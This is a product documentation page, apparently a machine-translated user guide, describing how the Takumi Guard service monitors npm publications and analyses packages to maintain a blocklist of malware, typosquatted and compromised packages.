Skip to main content

Intelligence

info

The English user guide is currently in beta preview. Most of the documents have been automatically translated from the Japanese version. Should you find any inaccuracies, please reach out to Flatt Security.

The Takumi Guard blocklist is maintained by a threat analysis platform built and operated by the GMO Flatt Security research team. This page explains how threat intelligence is collected and how blocking decisions are made.

Analysis Pipeline

The blocklist is built through the following pipeline:

1. New Package Monitoring

The npm registry provides a change feed via the Replicate API that streams package publications and updates in real time. This feed is continuously monitored, ensuring packages are analyzed shortly after publication.

2. Automated Analysis

Fetched packages are run through an automated analysis pipeline built by the research team. Multiple techniques are combined to determine malicious intent, including inspection of install scripts, detection of obfuscated code, matching against known malware patterns, and execution in a sandbox environment to detect suspicious behavior.

3. Verdict and Blocklist Update

Based on analysis results, packages are classified into the following categories:

  • Malware: Packages that perform malicious actions during installation or execution
  • Typosquatting: Packages with names similar to popular packages that distribute malicious code
  • Compromised packages: Legitimate packages with versions containing injected malicious code due to account takeover

The blocklist is updated continuously and propagated to all Takumi Guard instances.

Compared to Public Advisories

Public advisory databases (such as the GitHub Advisory Database) have a time lag between reporting/confirmation and publication. Takumi Guard's intelligence platform performs real-time analysis from the change feed, enabling detection of zero-day malicious packages before they appear in public advisories.

Coverage

The intelligence platform currently covers the npm ecosystem. Support for additional package ecosystems (PyPI, RubyGems, etc.) is planned for future expansion.

Last updated on